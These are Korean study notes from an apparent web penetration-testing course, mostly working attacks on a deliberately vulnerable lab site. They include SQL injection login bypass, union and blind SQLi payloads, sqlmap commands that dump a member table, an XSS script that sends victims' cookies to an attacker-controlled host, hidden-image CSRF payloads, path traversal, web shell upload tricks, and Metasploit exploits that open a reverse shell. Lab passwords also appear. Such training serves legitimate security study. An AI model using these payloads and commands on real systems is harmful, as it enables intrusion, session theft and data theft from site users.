https://padlet.com/jaeminsg/4-t06frufenmdt7edu

210.121.193.52 : 테스트 서버

http://192.168.1.29/ : 테스트 서버

http://210.121.193.53/gmshop/ : 테스트 하기 좋은 사이트

진단 필요한 툴

• Set character encoding : 화면이 깨져 보일때 사용할 수 있는 크롬 확장자 → Korean EUCKR 선택
• 드래그프리 : 사이트 복사하기 힘들때 사용하는 크롬 확장프로그램
• powertoys : 캡처할때 캡처 안되는 그림파일 같은 것들을 캡쳐해서 붙여넣기 하면 텍스트로 붙여넣어짐
• editcookies : 세션 값을 보는법 크롬 확장프로그램

XSS vs CSRF 주관식 (비교) 서술해야함

XSS

세션을 탈취, 악성코드 연결

Reflective XSS

• 클릭을 유도

Stored XSS

• 게시물을 보게 하는 것

  

세션 값을 보는법

크롬 확장앱 : editcookies

개발자모드 → 어플리케이션 → 쿠키를 통해 쿠키값을 확인 할 수 있고 수정 할 수 있다.

개발자모드 → 네트워크 들어가서 웹 페이지를 새로고침을 하면 시간적 요소도 볼 수 있다.

이것을 통해 어디서 지연이 생기는지 파악할 수 있다.

실습 4 SQLi 로 인증우회 (실습안함)

실습 4 SQLi 로 인증우회

1. 관리자 페이지 찾기

구글검색 or Nikto or Nmap or OWASP-ZAP 등

nikto -h http://210.121.193.52 (취약점과 중요 경로) nikto -h http://210.121.193.52 -C all (관리자페이지 찾기위한 내장 플러그인 활용) nikto -h http://210.121.193.52 -fileext php,asp,html

nmap -p 80,443 210.121.193.52 nmap --script http-enum -p 80 210.121.193.52

210.121.193.52/admin/

SELECT admin_Id, admin_Pass from admin WHERE admin_ID = ' "& Request("admin_id") &" ' AND admin_Pass =' "& Request("admin_pass") &" '

' or '1'='1

SELECT admin_Id, admin_Pass from admin WHERE admin_ID = ' ' or '1'='1 ' AND admin_Pass =' ' or '1'='1 '

스크립트 문자열 우회방법

(1)

아래와 같이 겹쳐쓰면, script 하나가 필터링되고 나머지가 붙으면서 스크립트가 실행이 된다.

<input type="text" name="w" value=" "><script>alert(document.cookies);</script>-- " size="15">

<script scr= "http://210.121.193.53/a.js></script>

이 코드는 외부 JavaScript 파일을 불러오는 데 사용됩니다.

시나리오

1. 브라우저에서 테스트1 / 1111 으로 로그인을 한다.
2. 새로운 브라우저를 열어 위의 쿠키값을 개발자모드 → 응용프로그램 → 쿠키값에 붙여넣기

   

   • Metasploitable2
   • bee-box

실습 5 XSS

1. 210.121.193.52

   쿠키를 attacker에게 전송한는 스크립트로 게시물 내용에 적어 넣으면 됩니다. 크기가 0인 이미지이므로 보이지는 않습니다.

   [공격 실습] <script src= "http://210.121.193.53/a.js"></script>

   <a.js> document.write("<iframe src='http://210.121.193.53/cookie.php?cookie="+document.cookie+"' width=0 height=0></iframe>");

CSRF 실습

210.121.193.52/login/member_modify.asp?re_url=&mem_pwd=1111&mem_email=test%40test.com&tel1=02&tel2=111&tel3=1111&hp1=011&hp2=111&hp3=1111&zip1=111&zip2=111&addr1=111&addr2=

<img src="http://210.121.193.52/login/members_modify_ok.asp?re_url=&mem_pwd=1111&mem_email=test%40test.com&tel1=02&tel2=111&tel3=1111&hp1=011&hp2=111&hp3=1111&zip1=111&zip2=111&addr1=111&addr2=" width=0 height=0>

(시나리오)

test2 가 스크립트 게시물을 읽을 경우 test1 의 정보를 불러와서 (주민번호를 제외한) 나머지 정보 수정할 때 적었던 내용들이 모두 test1 의 정보로 변경이 된다.

실습 6 CSRF

CAMEL 사이트 [정보수정] 에서

정보수정하는 URL 을 캡쳐

<img src="http://~" width=0 height=0>

으로 만들어서 게시물에 올림

게시물을 본 사람의 정보가 수정됨

이유?

update member set mem_pwd='"&mem_pwd&"', ....

where mem_id='"&session("id")&"'

현재 세션값의 id의 정보 수정하게 됨

실습 6 CSRF

POST 를 GET 방식으로 변환

210.121.193.52/login/members_modify_ok.asp?re_url=&mem_pwd=1111&mem_email=test%40test.com&tel1=02&tel2=111&tel3=1111&hp1=011&hp2=111&hp3=1111&zip1=111&zip2=111&addr1=111&addr2=

<img src="http://~ " width=0 height=0> 으로 안보이는 이미지로 변환

다음을 게시물에 입력 <img src="http://210.121.193.52/login/members_modify_ok.asp?re_url=&mem_pwd=1111&mem_email=test%40test.com&tel1=02&tel2=111&tel3=1111&hp1=011&hp2=111&hp3=1111&zip1=111&zip2=111&addr1=111&addr2=" width=0 height=0>

내 비밀번호는 안전할까?

https://www.security.org/how-secure-is-my-password/

숫자는 101010 ……. 총 자리 수 이런식으로 계산된다.

엔터프라이즈관리자 : DB를 관리하는 도구

SQL server _ server 그룹 _ local _ 데이터베이스 _ camel _ 테이블 → 모든사용자

http://210.121.193.52/[board/index.asp](http://192.168.145.136/board/index.asp)?cmd=view&gubun=gel&info_idx=3 and ascii(substring((select distinct top 1 table_name from information_schema.tables order by table_name asc), 1,1)) =97

실습7 Blind SQLi

실습7 blind SQL 인젝션

1. 에러 유발 - 에러가 안나는 것은 필터링 처리 때문 info_idx=6 뒤에 ' 입력 > 에러발생
2. 문자변수인지 숫자변수인지 확인 ~ info_idx=6 ' and '1'='1 문자로 인식할 경우 (에러 발생) ~ info_idx=6 and 1=1 숫자로 인식할 경우 (에러 안남)
3. blind SQL 인젝션의 기본 조건은 참과 거짓에 따라 다른 반응을 보이는 것 ~ info_idx=6 and 1=1 참 (에러 안남) ~ info_idx=6 and 1=2 거짓 (에러 발생)
4. ==> blind sql 인젝션 가능성 확인
5. 아스키코드 ~ info_idx=6 and ascii('a') between 32 and 127
6. substring 함수 substring('abc',1,1) 의미는 'abc' 단어의 첫번째 글자, 한 개 즉 a를 뜻함 ~ info_idx=6 and ascii(substring('abc',1,1)) = 97
7. between a and b는 안해도 되지만 좀더 쉽게 하기 위함, 또는 '=' 필터링 시 사용 ~ info_idx=6 and ascii(substring('abc',1,1)) between 32 and 127
8. 'abc' 대신 db 테이블을 가져와야 하므로 쿼리문 (select distinct top 1 table_name from information_schema.tables order by table_name asc) distinct top 1 : 맨위의 테이블 한개만 information_schema.tables : 모든 테이블명을 관리하고 있는 테이블 order by table_name asc : table_name 작은것 부터 순서대로 정렬
9. 순서대로 정렬된 첫번째 테이블의 첫글자 가져오기 (예: admin 테이블)

http://210.121.193.52/board/index.asp?cmd=view&page=1&b_com=yes&gubun=gel&p_from=down&info_ref=6&info_idx=6 and ascii(substring((select distinct top 1 table_name from information_schema.tables order by table_name asc),1,1)) between 32 and 127

에러 안나는 쪽으로 숫자 범위를 좁혀간다. 첫번째 테이블의 첫번째 글자 = a

1. ascii( ~, 1,1)을 ascii( ~, 2,1) 로 바꾸어서 두번째 글자를 찾는다. 첫번째 테이블의 두번째 글자 = a
2. 세번째~ 글자를 모두 찾는다. 테이블 명 = admin
3. 첫번째 테이블의 첫번째 컬럼의 첫글자 찾기 http://~&info_idx=1 and ascii(substring((select distinct top 1 column_name from information_schema.columns where table_name = '첫번째 테이블명' order by column_name asc), 1,1)) between 97 and 126

information_schema.columns : 모든 컬럼명을 관리하고 있는 테이블

1. 첫번째 테이블의 첫번째 컬럼명 나머지 글자 찾기
2. 첫번째 테이블의 두번째 컬럼명 나머지 글자 찾기 http://~&info_idx=1 and ascii(substring((select distinct top 1 column_name from information_schema.columns where table_name = '첫번째 테이블명' and column_name not in (select distinct top 1 column_name from information_schema.columns order by column_name asc) order by column_name asc), 1,1)) between 97 and 126
3. 번째 테이블의 세번째 컬럼명 나머지 글자 찾기 http://~&info_idx=1 and ascii(substring((select distinct top 1 column_name from information_schema.columns where table_name = '첫번째 테이블명' and column_name not in (select distinct top 2 column_name from information_schema.columns order by column_name asc) order by column_name asc), 1,1)) between 97 and 127

not in (~ top 2 ~) 부분만 변경

1. 찾은 테이블명과 컬럼명으로 데이터 첫글자 확인 http://~&info_idx=1 and ascii(substring((select distinct top 1 컬럼명 from 테이블명), 1,1)) between 97 and 122

SQL map

쿠키를 가져와서 URL에 삽입한다.

sqlmap -u "http://192.168.1.23///board/index.asp?cmd=view&page=1&info_ref=6&b_com=yes&gubun=gel&p_from=down&info_idx=6" --cookie="ASPSESSIONIDSQCBCCAQ=MFMLLLJDBJAFJNAJMBNEMKBI" --current-db

실습 8 SQL map

실습8 SQL map

kali > sqlmap

1. 취약한 부분 확인 sqlmap -u "http://192.168.145.136/board/index.asp?cmd=view&page=1&info_ref=6&b_com=yes&gubun=gel&p_from=down&info_idx=6" --cookie="ASPSESSIONIDSQCBCCAQ=MFMLLLJDBJAFJNAJMBNEMKBI"
2. db 확인 sqlmap -u "http://192.168.145.136/board/index.asp?cmd=view&page=1&info_ref=6&b_com=yes&gubun=gel&p_from=down&info_idx=6" --cookie="ASPSESSIONIDSQCBCCAQ=MFMLLLJDBJAFJNAJMBNEMKBI" --current-db
3. table명 확인 sqlmap -u "http://192.168.145.136/board/index.asp?cmd=view&page=1&info_ref=6&b_com=yes&gubun=gel&p_from=down&info_idx=6" --cookie="ASPSESSIONIDSQCBCCAQ=MFMLLLJDBJAFJNAJMBNEMKBI" -D camel -tables
4. data 확인 sqlmap -u "http://192.168.145.136/board/index.asp?cmd=view&page=1&info_ref=6&b_com=yes&gubun=gel&p_from=down&info_idx=6" --cookie="ASPSESSIONIDSQCBCCAQ=MFMLLLJDBJAFJNAJMBNEMKBI" -D camel -T member -dump

우회 방법

php;.jpg

php.x

asp.kr

inc

웹쉘 사용

http://210.121.193.52/board/upload

이러한 방식으로 웹쉘을 실행해서 내가 원하는 작업을 할 수 있다.

실습 10 파일다운로드

웹쉘 파일 압축 플어서 업로드

실습 11 Metasploit

kali 192.168.145.129 camel 192.168.145.136

nmap -sV 192.168.145.136

nmap --script vuln 192.168.145.136

smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010).

msfconsole msf6 > search ms08-067 msf6 > use exploit/windows/smb/ms08_067_netapi msf6 exploit(windows/smb/ms08_067_netapi) > show options msf6 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.145.136 msf6 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp run

back msf6 > use exploit/windows/smb/ms17_010_psexec msf6 exploit(windows/smb/ms17_010_psexec) > show options msf6 exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.145.136 msf6 exploit(windows/smb/ms17_010_psexec) > set PAYLOAD windows/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_psexec) > run meterpreter > shell

주관식

1. request 메소드 중에 get 과 post 웹서버 로그에서 어떤식으로 되는지

get 변수 파라미터가 url 에 포함되어 있어 메인 로그에 기록됨

post 변수 파라미터가 url상에 보이지 않고 바디에 보여서 웹로그에 파라미터 부분이 보이지 않음 / 해커입장에서는 post 방식을 사용함

1. xss , csrf 방식이 뭐가 다른지

xss 는 클라이언트에서 실행이 된다. csrf 는 서버에서 실행이 된다.

1. db 쿼리값을 조작해서 시스템에 접근하는 공격을 뭐라고 부를까요

퀴리나 db 가 들어가면 SQL injection 이다.

1. 취약점 분석 단계 , 정보수집단계부터 시작해서 취약점분석단계 → 공격 침투단계 → 전의단계 설명한 페이지 확인

1. 모의해킹 공격을 할때 웹방화벽에서 탐지가 잘 안되는 공격들이 무엇인가

패턴기반은 탐지가 되지 않는다. 공격 중에 패턴으로 탐지하기 어려운 공격들이 있음 (아래참조)

• 파일업로드 공격(파일 내용을 다 까보지 못하니까, 확장자는 볼 수있음),
• URL 변수 공격(정상적인 공격으로 판단하지 때문에 웹 방화벽에서 탐지 하기 힘듬),
• 제로데이공격(패턴매칭 방식의 웹 방화벽 (알려진 패턴을 가지고 차단하기떄문에) 취약점은 발견은 됐지만, 패치가 안되어 웹방화벽에서 패턴을 패치하기 전 단계이기 떄문에 막기 힘들다.

https://padlet.com/jaeminsg/4-t06frufenmdt7edu

https://www.findip.kr/#google_vignette 공인아이피확인 사이트

https://후이즈검색.한국/

https://dencode.com/

210.121.193.52 : 테스트 서버

administrator / secul@b! (서버)

구내 네트워크 파악

• 윈도우 pc

ipconfig

ipconfig/all

http://www.findip.kr/

http://whois.kisa.or.kr/kor/main.jsp

https://uic.io/ko/mac/ : 어떤 장비인지를 확인할떄 벤더가 어디있는지 확인

nmap -sV [IP]

nmap -A [IP]

nmap -Pn -A -sS [IP]

• kali linux

ifconfig : 내 아이피 찾는 것

hostname -I :리눅스 시스템에서 호스트의 IP 주소를 출력

netstat -r : 현재 시스템의 라우팅 테이블을 표시

netstat -an : 현재 시스템의 네트워크 연결 상태를 표시

ip r l : 리눅스 또는 유닉스 시스템에서 라우팅 테이블을 확인

curl -4  icanhazip.com : 도메인이름을 ip로 바꿔줌 cmd 명령에서는 nslookup www.naver.com

nmap --script smb-enum-shares [IP] : 폴더 공유하고 있는거 찾을 때

nmap --script smb-os-discovery [IP] : smb 사용하고 있는 걸 찾을 때

nmap -sV [IP]

theHarvester -d ABC.com -b google

• wafw00f http://ABC.com

• 모의해킹 : 취약점을 통해 악성코드를 심거나, DB 정보를 가져오는 작업까지 행함
• 취약점 진단 : 취약점이있다는 것만 식별하고 보고서 작성

해킹 일련의 과정

1. 정찰
2. 스캐닝 및 취약점 분석
3. 침투
4. 권한상승
5. 백도어 관리
6. 흔적지우기

타겟 스코핑

• 타켓 네트워크 환경의 스코프(범위)를 관찰, 이해

정보 수집

• 구글, 포럼, 게시판, 뉴스그룹, 기사, 블로그, 소셜네트워크 등 인터넷 리소스를 이용

타겟발견

• 사용중인 기술, 네트워크 구성장비, 운영중인 서비스

타겟 탐색

• 타겟시스템의 열린 포트 검색

취약점 매핑

• 포트와 서비스 정보를 이용해 취약점을 찾고 분석

장악 유지

• 장악을 유지하여 시연할 때 침투 테스트 과정을 다시 수행하지 않아도 되므로 시간, 비용 절감
• 프로토콜, 프록시, 단대단 연결방식 등을 이용하는 터널링 기술을 사용해서 필요한 기간 동안 숨어 있을 수 있다.

문서화와보고

• 모의해킹을 하면서 과정들을 캡쳐해서 문서화 시킨다. (문서화 시킬떄는 그걸 보고 따라 할 수 있을 정도로 만들어야한다)
• 마지막 단계로 발견, 검증, 익스플로잇한 취약점의 발표, 문서화, 보고를 해야한다.

www 를 제외하고 검색해야지 전체 URL을 볼 수 있다.

SITE : 구글 검색에서 특정 도메인이나 웹사이트 내에서 정보나 페이지를 검색할 때 사용하는 검색 연산자

INURL : 구글 검색에서 특정 URL 패턴을 찾기 위해 사용하는 검색 연산자

FILETYPE 구분해서 적어야함 ex) xls,doc,docx,php …

INTEXT : 사이트 안에 텍스트로 되어 있는 것 중 검색

NUMRANGE : 안에 있는 숫자들을 검색할떄 사용

구글 검색을 통한 예시

• filetype:xls 학번

https://www.exploit-db.com/google-hacking-database

특정 파일 찾기

filetype:xls 학번

index.of ws_ftp.log or filetype:log버전 확인

intitle:index.of "server at"

filetype:xls username password email

사내 인트라넷 검색

intitle: intranet inurl:intranet +intext:"human resources"

사용 예)

site:www.ABC.com

site:ABC.com                         : 고객사 사이트를 전체적으로 검색

site:ABC.com intitle:index.of   : 디렉토리리스팅 페이지 검색

site:ABC.com intitle:login        : 로그인 페이지 검색

site:ABC.com inrul:/admin       : 관리자 페이지 검색

site:ABC.com intitle:관리자       : 관리자 페이지 검색

site:ABC.com filetype:xls         : 파일검색

site:ABC.com -site:m.ABC.com

www.ABC.com/robots.txt

NMAP

nmap -sV 210.121.193.53

nmap -O 210.121.193.53

nmap -A 210.121.193.53

nmap -v --script vuln 210.121.193.53

nmap -Pn -A -sS 210.121.193.52

Pn = 보통 ICMP를통해 포트가 살아있는지 확인을 하는데 ping 을 안치고 바로 포트로 가겠다.

-O : 운영체제OS가 무엇인지 보여줌

-S : 서비스 버전을 보여줌

-A : -O + -S (이 서버 운영체제를 알려주고, 서비스 버전까지 보여주는 옵션)

-sS : 스캔을 할 떄 TCP 3way handshake 전체 연결을 맺는게 보통인데, sS 옵션은 스텔스모드라고 해서 중간에 끊어서 서버에서 모르게 하는 것. 세션을 맺어버리면 보안장비에서 알 수 있기 떄문에 스텔스 모드로 사용하기 위해 -sS 옵션을 사용한다.

-v : 과정이 안나와서 잘 돌아가는지 모를 때 사용

nmap —script vuln 210.121.193.52

칼리리눅스

pentest / secul@b!

sudo su -

secul@b!

웹 방화벽 유무

• wafw00f http://victim.org

nmap NSE (Nmap Scripting Engine)

 Categories

• default : 타겟 도메인의 전반적인 항목에 대해 스캔 수행
• safe : 안전한 항목에 대해 스캔 수행
• auth : 인증과 관련된 스크립트, anonymous ftp 스캔 등
• discovery : 대상에 대한 깊이 있는 정보를 찾는 스크립트들
• external : 외부의 자원(resources)을 활용한 스크립트들
• intrusive : 대상에 대한 공격 시도를 하는 스크립트들
• malware : 백도어나 악성코드(malware) 점검과 관련된 스크립트들
• Vuln : 알려진 취약성을 점검하는 스크립트들

nessus

• 취약성 점검 프로그램
• 다양한 형태로 리포트를 제공하며 취약점에 대한 빠른 업데이트가 가능한 프로그램
• Essential 버전
• 무료
• 16개 IP 스캔가능
• 컴플라이언스 체크와 감사는 사용불가

CVE (Common Vulnerabilities and Exposure)  소프트웨어의 보안 취약점을 가리키는 표기법  CVE-2014-NNNN...N  CVE-해당연도-취약점번호

▣ CVSS (Common Vulnerability Scoring System, 취약점 점수 시스템) 취약점의 심각도를 판단하는 기준

HTTP Request  웹 클라이언트가 웹 서버에게 자원을 요청하는 것  HTTP Request에 포함된 상세 정보

GET 과 POST의 차이

GET : URL 주소에 쭉 들어가게 적어서 웹로그만 보면 노출이 된다. → head 에 들어감

POST : 홈을 만들어서 그 안에 넣게 하는 방식, 웹로그만 보면 노출이 되지 않는다→ 변수가 Body 부분에 담김

PUT : put을 넣고 내용을 집어넣으면 그 서버에 들어가서 절대 사용 x

DELETE: 웹서버에 있는 자료를 삭제 할 수 있는 메소드

HTTP Response

200 OK : 서버 자원이 있다.

403 Forbidden : 서버 자원이 있는데, 금지 시킴

404 Not Found : 서버 자원이 없다.

Session

• 어떤 일이 시작되는 시점부터 끝날 때까지를 의미, 네트워크에서는 두 대의 시스템간의 활성화된 접속을 의미

세션 : 서버에 저장

쿠키 : PC에 저장

결국, 세션과 쿠키는 똑같은 값을 가진다.`

XSS

• 보는 사람이 게시물을 클릭하는 순간 스크립트가 실행 ( 쿠키정보를 팝업으로 띄울 수 있고, 밖으로 보낼 수도 있다.)
• 공격에 성공하면 사이트에 접속한 사용자는 삽입된 코드를 실행하게 되며, 의도치 않은 행동을 수행시키거나 쿠키나 세션 토큰 등의 민감한 정보를 탈취

SQL injection

• select mem_id from member; union select dong_juso from juso;

결과 예시)

test1

test2

test3

대치동

영화동

select dong from member where dong_name = ‘대치동’;

대치동’ 이런식으로 ‘ 를 하나 더 찍어서 검색을 하면

select dong from member where dong_name = ‘대치동’’ ; 으로

‘으로 에러 메시지가 나오게 되면, SQL injection 취약점을 발견할 수 있는 가능성이 높아진다.

아래와 같이 세밀론으로 문장을 끝내본다.

대치동’;

1. where dong_name = ‘대치동’
2. where dong_name = ‘대치동’’ (에러)
3. where dong_name = ‘대치동’;—’ ( — 뒤를 무시하라는 뜻 , 에러안남)
4. 대치동’ union select nul from information_schema.table ;—
5. 글자 제한이 걸려있어서 필터링이 걸려있음 → 버퍼 슈트

1. 대치동’ union select null,null,null,null,null,null from information_schema.table ;— (통과)
2. 문자열에 숫자를 넣어 공백을 확인한다
3. 대치동’ union select ‘1’,’2’,’3’,’4’,’5’,’6’ from information_schema.table ;—
4. 대치동’ union select ‘1’,table_name,’3’,’4’,’5’,’6’ from information_schema.table ;—
5. 대치동’ union select ‘1’,column_name,’3’,’4’,’5’,’6’ from information_schema.columns where table_name = ‘admin’ ;—
6. 대치동’ union select ‘1’,admin_id,admin_pass,’4’,’5’,’6’ from admin ;—
7. 어드민 아이디, 비밀번호가 보임
8. 스캔했을때 어드민 페이지가 있는 것을 확인 http://192.168.145.136/admin
9. 어드민 아이디, 비밀번호 넣고 접속

실습 1 회원가입 시 js 우회

실습 1

burp suite 설치

proxy tool 로서 request와 response를 중간에서 가로채서 보거나

수정할 수 있게 해주는 tool.. paros와 burp suite가 대표적이고 이외에도 몇개 더 있다.

210.121.193.52 camel

회원가입 - 주민등록번호 입력 우회

burp > porxy > intecept responses 에 체크 - close

open browser > 210.121.193.52 > intercept is on

회원가입 -burpsuite 에서 function jumin1(){ ~ document.form.submit();

사이를 삭제 > forward

이름대충 > 주민등록 번호 대충 > 회원가입 > intercept off

실습2 테스트 계정 찾기

실습 2

test 계정과 pw 찾기

아이디 : [ ] 중복체크기능 활용

일반계정 : test, test1, test2, ... test11,..... test123,...

관리자계정 : root, admin, manager,....

찾았으면 로그인 창으로 가서 패스워드 찾기

id와 동일, 1, 11, 111, ... 123, ... 1234, 0000 등

가능하면 2개 이상 찾기

실습 3 Union SQL injection

1. union SQL Injection

1. 문자 변수인지 숫자 변수인지 확인 대치동 대치동' 대치동';-- 대치동' union select 1,1,1,1,1 ;--
2. 필드 길이제한 확인 burpsuite 에서 limit 해제 proxy > proxy setting > Response modification rules

Remove input field length limits

대치동' union select null,null,null,null from information_schema.tables;--

1. 컬럼 갯수 맞추기
   • 갯수 안맞으면 에러
2. 숫자인지 문자인지 맞추기 null 을 1 (숫자) 또는 '1' 로 바꿔서 컬럼의 type 맞추기
3. 적당한 필드에 table_name 넣어서 확인하기
4. 찾은 table_name 의 column_name 확인하기
5. 관리자 table 에서 관리자 id와 pw 확인하기

실습 3 Union SQL injection

대치동

대치동'

대치동';

대치동';--

proxy setting > remove input field length limit 체크

대치동' union select '1','2','3','4','5','6' from information_schema.tables ;--

대치동' union select '1',table_name,'3','4','5','6' from information_schema.tables;--

대치동' union select '1',column_name,'3','4','5','6' from information_schema.columns

where table_name = 'admin' ;--

대치동' union select '1',admin_id,admin_pass,'4','5','6' from admin;--

select admin_id, admin_pw from admin where admin_id = ‘test ‘ or ‘1’=’1’;

‘ or ‘1’=’1

다운로드 취약점

http://210.121.193.52/board/download.asp?file_name=/board/download.asp

http://210.121.193.52/board/download.asp?file_name=../board/download.asp

http://210.121.193.52/board/download.asp?file_name=../../board/download.asp

http://210.121.193.52/board/download.asp?file_name=../../board/index.asp (DB연결정보)

코드는 추후 사용할 수 있기때문에 메모장에 복사해 놓는다.

http://210.121.193.52/board/download.asp?file_name=../../board/dns.asp

Cross Site Script Process

SQL INJECTION - server side attack

공격자가 입력한 데이터에 대한 유효성을 점검하지 않아 DB 쿼리문이 변경 되어 부적절한 SQL 명령을 수행할 수 있는 공격이다

-> 데이터베이스의 내용을 웹상으로 쭉 유출시키는 공격기법

-> 커멘드명령, DB 내용, 서버 컨트롤 장악 하는 공격

** XSS 는 클라이언트쪽 사용자 권한을 획득하는 사용자의 패스워드, 정보를 바꾸는 형태이다.

SQL INJECTION 종류

• Union (옛날 공격기법) - 실습예정
• Error Based (옛날 공격기법)
• Blind SQL (최근 가장 많이 발생하는 취약점) - 실습예정
• Stored Procedure based

SQL 인젝션 취약점이 존재할 경우, 공격자는 xp_cmdshell과 같은 확장 프로시저를 통해 서버의 운영 체제에 대한 불법적인 접근을 시도할 수 있다.

공격 유형 : DB 정보 열람, DB 정보 변경/삭제, 커맨드 명령 실행, 파일 생성 및 실행

SQL대표적인 커맨드 : select, update, delete, insert

• Union

'or''=’  (조건을 항상 참으로 만든다.)

아이디 / 비밀번호에 동일하게 입력한다.

Check for vulnerability

Check for UNION function (no값이 유효하지 않아야 원하는 값 출력)

http://freehack.bug/?main=/board/board_view.php3&no=0' union select 1,2,3,4,5,6,7%23

프로그램에서 1 5 7은 출력은 하라는 소스가 스크립트에 없기 떄문에 출력이 되지 않는다.

Check for MySQL version

http://freehack.bug/?main=/board/board_view.php3&no=0' union select 1,2,3,@@version,5,6,7%23

공격 프로세스

information schema에서 table name 뽑아옴 → 실제 member table의 아이디, 패스워드를 뽑음

http://freehack.bug/?main=/board/board_view.php3&no=0' union all select 1,2,3, column_name,5,6,7 from information_schema.columns where table_name='member' limit 0,1%23 <--- no

http://freehack.bug/?main=/board/board_view.php3&no=0' union all select 1,2,3, column_name,5,6,7 from information_schema.columns where table_name='member' limit 1,1%23 <--- id

http://freehack.bug/?main=/board/board_view.php3&no=0' UNION SELECT 1,2,3,column_name,5,6,7 from information_schema.columns where table_name='member' limit 2,1%23 <--- pass

http://freehack.bug/?main=/board/board_view.php3&no=0' UNION SELECT 1,2,id,pass,5,6,7 from member limit 0,1%23 <-- admin,

*A4B6157319038724E3560894F7F932C8886EBFCF

http://freehack.bug/?main=/board/board_view.php3&no=0' UNION SELECT 1,2,id,pass,5,6,7 from member limit 1,1%23<-- guest,

• A4B6157319038724E3560894F7F932C8886EBFCF

• Blind SQL

데이터베이스 결과가 외부에 출력되지 않고(ex> 로그인 서비스), 서버 내부적으로만 처리되는 구조에서 SQL Injection 기법을 통해 데이터베이스에 존재하는 값을 알아내는 공격 방식이다.

일반적으로 참/거짓을 이용하여 데이터를 얻어온다.

ex> 로그인 성공 -> 참, 로그인 실패 -> 거짓

• Union INJECTION → 덩어리채 뽑음

• Blind INJECTION → 글자 하나씩 대조

예를 들어 s라는글자를 뽑아오고 → i 뽑고 .. → g 뽑고

(a부터 쭉 집어넣고 한글자씩 대조를 해서 요청을 한다.

** Union select보다 훨씬 서버쪽으로 요청하는 쿼리의 양이 많아질수 밖에 없다.

노가다로 한단어씩 추출한다. 단어가 맞을 경우 통과되고 아닐경우 에러메시지가 올라온다.

아래와 같이 ID에 SQL query / PASSWORD 1234 또는 아무거나 입력하고 로그인을 시도

// Database 이름 크기 추출
id : kioo' and length(DATABASE()) < 12##  (T)
id : kioo' and length(DATABASE()) = 10##  (F)
id : kioo' and length(DATABASE()) = 8##  (freehack, T)
id : kioo' and length(DATABASE()) < 7##  (F)


// Database 이름 추출
id : kioo' and ASCII(SUBSTRING((DATABASE()),1,1)) < 102##  (F)
id : kioo' and ASCII(SUBSTRING((DATABASE()),1,1)) = 102##    -> f
id : kioo' and ASCII(SUBSTRING((DATABASE()),2,1)) = 114##    ->r
id : kioo' and ASCII(SUBSTRING((DATABASE()),3,1)) = 101##    -> e

// Table 이름 추출
kioo' and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE TABLE_SCHEMA='freehack' limit 0,1),1,1)) < 130##
kioo' and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE TABLE_SCHEMA='freehack' limit 0,1),1,1)) = 98##  -> b
kioo' and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE TABLE_SCHEMA='freehack' limit 0,1),2,1)) = 111## -> o
kioo' and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE TABLE_SCHEMA='freehack' limit 0,1),3,1)) = 97## -> a

kioo' and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE TABLE_SCHEMA='freehack' limit 1,1),1,1)) = 109##  -> m
kioo' and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE TABLE_SCHEMA='freehack' limit 1,1),2,1)) = 101## -> e

// 컬럼명 추출
kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 0,1),1,1)) < 130##
test' or ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 0,1),1,1)) < 130##


kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 0,1),1,1)) = 110## ->n
kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 0,1),2,1)) = 111## ->o


kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 1,1),1,1)) = 105## ->i
kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 1,1),2,1)) = 100## -> d

kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 2,1),1,1)) = 112## ->p
kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 2,1),2,1)) = 97## -> a
kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 2,1),3,1)) = 115## -> s
kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 2,1),4,1)) = 115## ->s

// 패스워드 추출(1) *4ACFE3202A5FF5CF467898FC58AAB1D615029441

kioo' and ASCII(SUBSTRING((select pass from member limit 0,1),1,1)) < 130##
kioo' and ASCII(SUBSTRING((select pass from member limit 0,1),1,1)) = 42## ->*
kioo' and ASCII(SUBSTRING((select pass from member limit 0,1),2,1)) = 52## -> 4

// 패스워드 추출(2)
id : kioo' and (ASCII(substring(pass,1,1))=42) ##            ->----------- 42 는 * 임
pw : 아무거나  
* C8D060EB2D0AEFC164BE22E2F8A52C0E99AF19A9

id : kioo' and (ASCII(substring(pass,2,1))=67) ##            ->---------- 67 는 C 임
pw : 아무거나

id : admin' and (ASCII(substring(pass,1,1))=42)## ->----------- 42 는 * 임
pw : 아무거나
*A4B6157319038724E3560894F7F932C8886EBFCF

폰트 스캐너 (사용 주의)

"폰트 스캐너"라는 용어는 일반적으로 웹사이트나 애플리케이션에서 사용되는 폰트를 분석하고 식별하는 도구나 기술을 의미할 수 있습니다. 폰트 스캐너는 웹페이지에서 사용된 폰트의 종류와 스타일을 추출하여 이를 보여주는 기능을 가집니다.

nmap -v -A freehack.bug

SQL MAP

https://sqlmap.org/ 접속후 오른쪽에 다운로드 zip파일 다운

https://github.com/sqlmapproject/sqlmap/zipball/master

sqlmap.py --shell

